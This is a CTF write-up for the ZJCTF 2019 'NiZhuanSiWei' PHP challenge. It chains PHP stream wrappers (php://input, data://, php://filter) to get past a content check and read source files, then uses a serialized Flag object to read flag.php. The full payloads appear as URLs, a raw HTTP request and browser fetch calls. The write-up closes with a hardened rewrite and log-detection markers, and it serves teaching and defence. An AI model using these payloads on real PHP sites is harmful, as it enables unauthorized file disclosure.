# [ZJCTF 2019]NiZhuanSiWei

## 00. Setting up the environment

While writing this writeup the buu range was temporarily unreachable, so I brought the challenge up myself with docker from the link the task provides:

```bash
docker-compose up -d          # bring the container up first
http://192.168.155.1:8302/    # use ipconfig to find your own IPv4 address; any 192.* address works
```

Opening the range address shows the source code. Copy it out and analyze it:

```php
<?php
$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        echo "Not now!";
        exit();
    }else{
        include($file);  //useless.php
        $password = unserialize($password);
        echo $password;
    }
}
else{
    highlight_file(__FILE__);
}
?>
```

## 01. Arbitrary file read via PHP stream wrappers

The challenge takes three GET parameters and filters none of them.

```php
$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
```

Look at the first parameter, `text`. It must be set (`isset($text)`) and whatever `file_get_contents($text,'r')` reads must be exactly the string `welcome to the zjctf`. Once that holds we enter the first `if` branch and the page prints `welcome to the zjctf` inside an `<h1>` tag:

```php
echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
```

`file_get_contents` reads the contents of a file, so how do we make it return the string we want? This is where a stream wrapper comes in: `php://input`. Build the request like this:

:::info
GET: `?text=php://input`
POST body: `welcome to the zjctf`
:::

`file_get_contents` then reads from the POST input stream and the first check passes.

Hmm, but as luck would have it, it didn't work: no `<h1>` with `welcome to the zjctf`, no response at all. So let's switch to the `data://` wrapper, which needs only a GET request:

```text
d2VsY29tZSB0byB0aGUgempjdGY=    // "welcome to the zjctf" base64-encoded
?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=
```

The result: `welcome to the zjctf` is displayed in the `<h1>`. I later tested sending the `php://input` request from the browser console and it does return successfully; for some reason it just doesn't work from hackbar. The JavaScript used in the console:

```javascript
fetch("http://192.168.155.1:8302/?text=php://input", {
  method: "POST",
  body: "welcome to the zjctf",
  headers: { "Content-Type": "application/x-www-form-urlencoded" }
}).then(res => res.text()).then(data => console.log(data));
```

The same works from burp.

## 02. File inclusion + deserialization

Now we keep going. The next step is the `include` file-inclusion operation. It explicitly blocks `flag.php` so we cannot include it directly, but nothing else is filtered. Following the hint in the source, let's include `useless.php` first and see what it is; from the name I'd guess it involves serialization.

```php
if(preg_match("/flag/",$file)){
    echo "Not now!";
    exit();
}else{
    include($file);  //useless.php
    $password = unserialize($password);
    echo $password;
}
```

It includes the GET parameter `file`, so our payload uses the `php://filter` wrapper:

```text
file=php://filter/read=convert.base64-encode/resource=useless.php
```

The burp response is shown below. If you use hackbar, use the GET-only payload:

```text
?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=php://filter/read=convert.base64-encode/resource=useless.php
```

It returns a base64 string. After decoding, the contents of `useless.php` are:

```php
<?php
class Flag{  //flag.php
    public $file;
    public function __tostring(){
        if(isset($this->file)){
            echo file_get_contents($this->file);
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }
    }
}
?>
```

The `Flag` class uses the `__tostring` magic method together with `file_get_contents`, and the `$file` property is under our control. So we build an object whose `$file` property equals `flag.php`, serialize it, and pass the serialized data in the `password` parameter (note that `file` still has to include `useless.php`, otherwise the class is not defined). In `index.php`, `$password` is unserialized: the server turns our payload back into an object and then runs `echo $password`. Because `$password` is now an object, treating it as a string triggers `Flag::__tostring`, which executes `echo file_get_contents($this->file)`. Since `$file` is now `flag.php`, `file_get_contents` reads `flag.php` and prints the flag.

```php
}else{
    include($file);  //useless.php
    $password = unserialize($password);
    echo $password;
}
```

Following the hint, read `flag.php`:

```php
<?php
class Flag{
    public $file = "flag.php";
}
echo serialize(new Flag());
?>
```

Output:

```text
O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
```

The payload:

```http
POST /?text=php://input&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";} HTTP/1.1
Host: 192.168.45.1:8302
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/132.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
Content-Length: 20

welcome to the zjctf
```

Or, as a single GET:

```text
/?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
```

The flag is inside an HTML comment, so view the page source.

Flowchart: (image not included in the text)

The console JavaScript I used when first solving the challenge:

Bypass the `if`:

```javascript
fetch("http://9a71c521-6c7a-4823-b0e7-c7145398cafe.node5.buuoj.cn:81/?text=php://input", {
  method: "POST",
  body: "welcome to the zjctf",
  headers: { "Content-Type": "application/x-www-form-urlencoded" }
}).then(res => res.text()).then(data => console.log(data));
```

Read `useless.php`:

```javascript
fetch("http://9a71c521-6c7a-4823-b0e7-c7145398cafe.node5.buuoj.cn:81/?text=php://input&file=php://filter/convert.base64-encode/resource=useless.php", {
  method: "POST",
  body: "welcome to the zjctf",
  headers: { "Content-Type": "application/x-www-form-urlencoded" }
}).then(res => res.text()).then(data => console.log(data));
```

Deserialize to get `flag.php`:

```javascript
fetch('http://9a71c521-6c7a-4823-b0e7-c7145398cafe.node5.buuoj.cn:81/?text=php://input&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}', {
  method: "POST",
  body: "welcome to the zjctf",
  headers: { "Content-Type": "application/x-www-form-urlencoded" }
}).then(res => res.text()).then(data => console.log(data));
```
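All three stages of this chain come from the same root causes in `index.php`: client-supplied strings reach `file_get_contents` and `include` unchanged (so any stream wrapper works, and the `/flag/` regex is a deny-list that `php://filter` walks around), and `unserialize()` runs on client data, which lets the client pick the class and therefore the `__toString` gadget. The hardened counterpart below is an added example, not the challenge's own code; the `./texts` and `./pages` directories, the allow-list contents and the JSON shape for `password` are assumptions made for the illustration. It goes a little beyond the single fix the writeup implies by closing all three gates at once.

```php
<?php
declare(strict_types=1);
// Hardened counterpart to the challenge's index.php. Added example, not the challenge's
// own code. Assumed for the illustration: texts live in ./texts, includable pages in
// ./pages, and "password" carries JSON of the shape {"file": "<name>"}.

const TEXT_DIR      = __DIR__ . '/texts';
const PAGE_DIR      = __DIR__ . '/pages';
const ALLOWED_PAGES = ['useless.php', 'about.php'];   // allow-list, not a /flag/ deny-list
const EXPECTED_TEXT = 'welcome to the zjctf';

// Map a client-supplied name to a regular file inside $dir, or return null.
// Only a bare file name passes the regex, so php://, data://, php://filter chains and
// ../ traversal never reach file_get_contents/include; realpath() covers symlink escapes.
function resolveInDir(string $dir, string $name): ?string
{
    if (!preg_match('/\A[A-Za-z0-9_-]+\.(?:txt|php)\z/', $name)) {
        return null;
    }
    $path = realpath($dir . '/' . $name);
    if ($path === false || !is_file($path) || strncmp($path, $dir . '/', strlen($dir) + 1) !== 0) {
        return null;
    }
    return $path;
}

// First gate: the text must come from a file the server owns, not from a stream the
// client controls. hash_equals() also avoids the byte-by-byte timing leak of ===.
function checkText(?string $text): bool
{
    $path = $text === null ? null : resolveInDir(TEXT_DIR, $text);
    return $path !== null && hash_equals(EXPECTED_TEXT, rtrim((string) file_get_contents($path)));
}

// Second gate: include only names on the allow-list. The original preg_match("/flag/")
// blocks one file name but still lets php://filter read any other source file.
function resolvePage(?string $file): ?string
{
    return ($file !== null && in_array($file, ALLOWED_PAGES, true)) ? resolveInDir(PAGE_DIR, $file) : null;
}

// Third gate: never unserialize() client data. The original lets the client choose the
// class, so Flag::__toString runs on echo. A JSON document decoded to an array
// instantiates nothing. If unserialize() cannot be removed, the minimum is
// unserialize($raw, ['allowed_classes' => false]) plus an is_string() check before any echo.
function parsePassword(?string $raw): ?array
{
    if ($raw === null || strlen($raw) > 256) {
        return null;
    }
    $data = json_decode($raw, true);
    if (!is_array($data) || !isset($data['file']) || !is_string($data['file'])) {
        return null;
    }
    return ['file' => $data['file']];
}

$text     = $_GET['text'] ?? null;
$file     = $_GET['file'] ?? null;
$password = $_GET['password'] ?? null;

if (!checkText($text)) {
    highlight_file(__FILE__);
    exit;
}
// Echo the constant, not the file contents, so the response never reflects client data.
echo '<h1>' . htmlspecialchars(EXPECTED_TEXT, ENT_QUOTES, 'UTF-8') . '</h1>';

$page = resolvePage($file);
if ($page === null) {
    http_response_code(403);
    exit('Not now!');
}
include $page;

$pw = parsePassword($password);
echo $pw === null ? 'no password' : htmlspecialchars($pw['file'], ENT_QUOTES, 'UTF-8');
```

For detection rather than prevention, every request in this writeup carries a distinctive marker in the query string: `php://input`, `data://text/plain;base64,`, `php://filter/` and a serialized object prefix such as `O:4:"Flag"`. None of these belong in a normal `text`, `file` or `password` parameter, so an access-log search or WAF rule on those substrings would have surfaced each of the three steps above.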